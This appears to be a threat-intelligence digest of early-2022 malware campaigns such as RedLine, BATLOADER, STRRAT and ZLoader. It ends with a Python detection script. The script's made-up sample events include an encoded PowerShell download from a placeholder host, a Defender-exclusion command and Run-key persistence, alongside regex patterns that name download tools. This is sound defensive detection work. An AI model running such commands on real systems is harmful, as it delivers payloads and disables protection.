CaddyWiper Data Wiper Attacks Ukraine

March 15, 2022

Initially discovered by ESET researchers and reported by BleepingComputer, a new data-destroying malware, named CaddyWiper, is attacking Ukrainian organizations.

Malware Services & PrivateLoader

February 15, 2022

Industry: N/A | Level: Strategic | Source: Intel471

Intel471 provides research on Pay-per-Install (PPI) malware services, outsourced operators willing to facilitate the “distribution and delivery” of malware for paying customers. The main distribution method has been search engine optimization (SEO) schemes that lure victims seeking pirated software. Intel471 also details an associated PPI program, PrivateLoader: “PrivateLoader sits at the front of this operation and communicates with its back-end infrastructure to retrieve URLs for the malicious payloads to ‘install’ on the infected host. As is the case with downloaders tied to PPI services, PrivateLoader communicates a variety of statistics such as which payloads were downloaded and launched successfully.” Based on tracking data keyed on unique download hashes, the most popular payloads dropped through the PPI service are Smokeloader, RedLine and Vidar. Although PPI operators do not want ransomware run through their services (an encrypted host renders their other malware inoperable), ransomware can still be executed from them; observed ransomware executions have been connected to banking trojans deploying the “LockBit and STOP Djvu ransomware families.”

Threat Group, TA402/Molerats & NimbleMamba Malware

February 15, 2022

Industry: Aviation, Government and Think Tanks | Level: Tactical | Source: ProofPoint

ProofPoint shares research on the threat group TA402 (aka Molerats), which has persistently targeted “Middle Eastern governments, foreign policy think tanks, and a state-affiliated airline” since late 2021. The group operates in the interests of the Palestinian Territories. The group frequently uses geofencing: only targets of interest are directed to malicious websites, while non-targets are sent to benign sites. Dating back to November 2021, the group’s phishing emails have used URLs on three different services, Quora, Dropbox and WordPress, to distribute a RAR file containing the NimbleMamba malware and/or the BrittleBush trojan. The Dropbox attack chain did not use geofencing; however, the Dropbox API was used for C2 communication.

  • Anvilogic Scenario: TA402/Molerats Threat Behavior
  • Anvilogic Use Cases:
    • DropBox API Traffic
    • Compressed File Execution
    • Output to File

RedLine Stealer Spreading from Illegitimate Windows 11 Upgrade

February 15, 2022

Industry: N/A | Level: Tactical | Source: HP – ThreatResearch

Threat research from HP has identified the distribution of the information-stealing malware RedLine Stealer posing as an installer for Microsoft’s latest Windows 11 release. The campaign is recent: one of the malicious domains, windows-upgraded[.]com, was registered on January 27th, 2022. The fraudulent Microsoft page offers a download link for a malicious zip file, “Windows11InstallationAssistant.zip”, which is hosted on Discord and contains “six Windows DLLs, an XML file and a portable executable.” When the malicious executable is run, an encoded PowerShell command executes and, after a 21-second timeout, downloads a jpg file. The jpg file is actually a disguised DLL. Once the DLL is loaded, the RedLine Stealer payload is active and proceeds with data collection and exfiltration as directed by the attacker.

  • Anvilogic Scenario: InfoStealer Malware Behaviors
  • Anvilogic Use Cases:
    • Encoded Powershell Command
    • Query Registry

SEO Poisoning dropping malware

February 08, 2022

Industry: N/A | Level: Tactical | Source: Mandiant

Mandiant Managed Defense has identified a threat campaign that distributes BATLOADER malware and malicious installations of the remote management software ATERA by building websites themed around free software and using search engine optimization poisoning to lure victims. The malicious webpages incorporate a Traffic Direction System (TDS) that checks visitor attributes to decide whether the visitor is sent to the malicious or a legitimate page, avoiding detection by security researchers. Two different infection chains are used. In the BATLOADER chain, users attempting to download the advertised software receive an installer that runs native tools such as PowerShell, Msiexec.exe and Mshta.exe to evade detection; a notable DLL file, “AppResolver.dll”, contains a malicious VBScript that is executed with Mshta.exe. In the ATERA chain, an MSI file is dropped to install the ATERA agent. To maintain persistence, the network discovery component of ATERA, Splashtop, is also installed, and scripts are pushed from the agent to tamper with the host by modifying Windows Defender file exclusions and downloading additional payloads. The activity is currently not attributed to a known threat actor group; however, some techniques overlap with the Conti playbooks leaked in August 2021.

  • Anvilogic Scenario: Malicious Software Download via MSI
  • Anvilogic Use Cases:
    • MSHTA.exe execution
    • MSIExec Install MSI File
    • Modify Windows Defender

APT36’s Malware Arsenal

February 01, 2022

Industry: N/A | Level: Tactical | Source: TrendMicro

TrendMicro’s tracking of APT36/Earth Karkaddan, covering January 2020 to September 2021, details the threat group’s recent campaigns. Three malware families were observed from the group: Crimson RAT (Windows), ObliqueRAT (Windows) and CapraRAT (Android). The group uses spear-phishing emails or a USB device for initial access. The phishing emails lure victims with themes involving the government, the coronavirus and others. Once a malicious link, file or document is executed, the RAT is dropped and executed on the system. Subsequent activity varies, as the RATs have numerous capabilities for system reconnaissance, data collection and exfiltration.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • New AutoRun Registry Key

Diavol Ransomware and TrickBot Group

January 25, 2022

Industry: N/A | Level: Operational | Source: IC3.Gov

In its latest flash report, the FBI shared that, since it began tracking Diavol ransomware in October 2021, an association has been observed between the ransomware group and the TrickBot group. The correlation comes from an overlap in the two groups’ tactics: the unique system/bot ID that Diavol generates on victim workstations uses a format nearly identical to the one used by TrickBot, and the ransomware gang uses Anchor DNS, a malware associated with TrickBot. The agency has shared limited technical details so far, providing high-level observations of the group instead. The threat actors have compromised several entities with ransom demands ranging from $10,000 to $500,000. While the group does use double extortion tactics, to date no data leaks have been found to be associated with Diavol.

  • Anvilogic Scenario: Diavol Ransomware

Remote Access Trojan – STRRAT

January 25, 2022

Industry: N/A | Level: Tactical | Source: Fortinet

Research from FortiGuard shares information on the remote access trojan (RAT) STRRAT, which has been active in the threat landscape since mid-2020. The latest activity involved distribution through phishing emails impersonating the shipping company Maersk, luring victims with messages about product shipments and deliveries. The initial dropper is contained in a Microsoft Excel document that downloads the RAT upon execution. The Java-based RAT is obfuscated with “Allatori Obfuscator.” The malware sets up persistence by adding entries to the autorun registry keys; additional capabilities include checking running processes, querying host information, logging keystrokes, and stealing browser and email credentials.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Case: Suspicious Email Attachment

ZLoader

January 05, 2022

Industry: N/A | Level: Operational | Source: CheckPoint

Research by Golan Cohen of CheckPoint Research identifies new activity with the ZLoader malware. The malware uses a compromised remote management software product, Atera, for initial access. After the agent is installed, batch scripts are executed to set up persistence and modify Windows Defender settings. The malware attempts to stay stealthy by using many LOLBin binaries.

  • Anvilogic Scenario: ZLoader Installation
  • Anvilogic Use Cases:
    • MSIExec Install MSI File
    • Executable Create Script Process
    • Modify Windows Defender
    • Invoke-WebRequest Command
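Several of the entries above (RedLine Stealer, SEO Poisoning, STRRAT, TA402 and ZLoader) share the same host-level use cases: an encoded PowerShell command, Mshta.exe and Msiexec.exe execution, Windows Defender exclusion changes, Invoke-WebRequest downloads, a script launched by an unusual parent executable, a new autorun registry key, and an executable run from an archive extraction folder. The script below is an added example written for this digest; it is not Anvilogic’s detection content and not code from any of the cited reports. It runs those checks over a handful of constructed Sysmon-style events (all paths, domains and values are made up for the example) and also decodes the UTF-16LE/base64 body of a -EncodedCommand so the decoded script can be inspected by the other rules.

```python
import base64
import re

# --- constructed sample telemetry (made up for this example, not from any report) ---

def _encode_ps(script: str) -> str:
    """Build the UTF-16LE/base64 form that powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Placeholder domain (.invalid) and a 21-second delay, mirroring the RedLine entry above.
_DECOY = ("Start-Sleep -Seconds 21; Invoke-WebRequest "
          "'http://win11-update.invalid/win11.jpg' -OutFile $env:TEMP\\win11.jpg")

SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Users\victim\Downloads\Windows11InstallationAssistant.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + _encode_ps(_DECOY)},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Users\victim\AppData\Local\Temp\setup.exe",
     "cmdline": r"mshta.exe C:\ProgramData\AppResolver.dll"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /i C:\Users\victim\AppData\Local\Temp\agent.msi /qn"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Program Files\ExampleRMM\agent.exe",   # hypothetical RMM agent path
     "cmdline": r"cmd.exe /c C:\ProgramData\defender.bat"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -Command Add-MpPreference -ExclusionPath C:\ProgramData"},
    {"type": "registry", "image": r"C:\ProgramData\updater.exe",
     "key": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"C:\ProgramData\updater.exe"},
    {"type": "process", "image": r"C:\Users\victim\AppData\Local\Temp\Rar$EXa9812.41\invoice.exe",
     "parent": r"C:\Program Files\WinRAR\WinRAR.exe", "cmdline": "invoice.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe notes.txt"},
]

# --- detection logic ---------------------------------------------------------------

# Common spellings of the switch (-e, -ec, -enc, -EncodedCommand) followed by base64.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe"}
COMMON_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "services.exe", "svchost.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_powershell(cmdline: str):
    """Return the decoded script of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_event(ev: dict) -> list:
    """Return the names of every use case that fires on one event."""
    hits = []
    if ev["type"] == "registry":
        if re.search(r"(?i)\\CurrentVersion\\Run(?:Once)?\\", ev["key"]):
            hits.append("New AutoRun Registry Key")
        return hits
    image, parent, cmd = _basename(ev["image"]), _basename(ev.get("parent", "")), ev["cmdline"]
    text = cmd  # text the content rules inspect; extended with the decoded body below
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            hits.append("Encoded PowerShell Command")
            text = cmd + " " + decoded
    if image == "mshta.exe":
        hits.append("MSHTA.exe execution")
    if image == "msiexec.exe" and re.search(r"(?i)(?:^|\s)/i\b|\.msi\b", cmd):
        hits.append("MSIExec Install MSI File")
    if image in SCRIPT_HOSTS and parent not in COMMON_PARENTS \
            and re.search(r"(?i)\.(?:bat|cmd|vbs|js)\b", cmd):
        hits.append("Executable Create Script Process")
    if re.search(r"(?i)\b(?:Add|Set)-MpPreference\b.*-(?:Exclusion|Disable)", text):
        hits.append("Modify Windows Defender")
    # iwr, wget and curl are Invoke-WebRequest aliases in Windows PowerShell.
    if re.search(r"(?i)\b(?:Invoke-WebRequest|iwr|wget|curl)\b", text):
        hits.append("Invoke-WebRequest Command")
    # WinRAR and 7-Zip extract "open" archive members into Temp\Rar$... / Temp\7z... folders.
    if re.search(r"(?i)\\Temp\\(?:Rar\$|7z)", ev["image"]):
        hits.append("Compressed File Execution")
    return hits


def run_detections(events: list) -> list:
    """Return (event_index, use_case) pairs for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name in classify_event(ev)]


if __name__ == "__main__":
    for idx, name in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Each rule is deliberately narrow and keyed on the process image or registry path rather than on command-line strings alone, since the encoded form of a PowerShell command hides its content until it is decoded; feeding the decoded body back through the content rules is what lets the download in the first event surface as an Invoke-WebRequest hit as well.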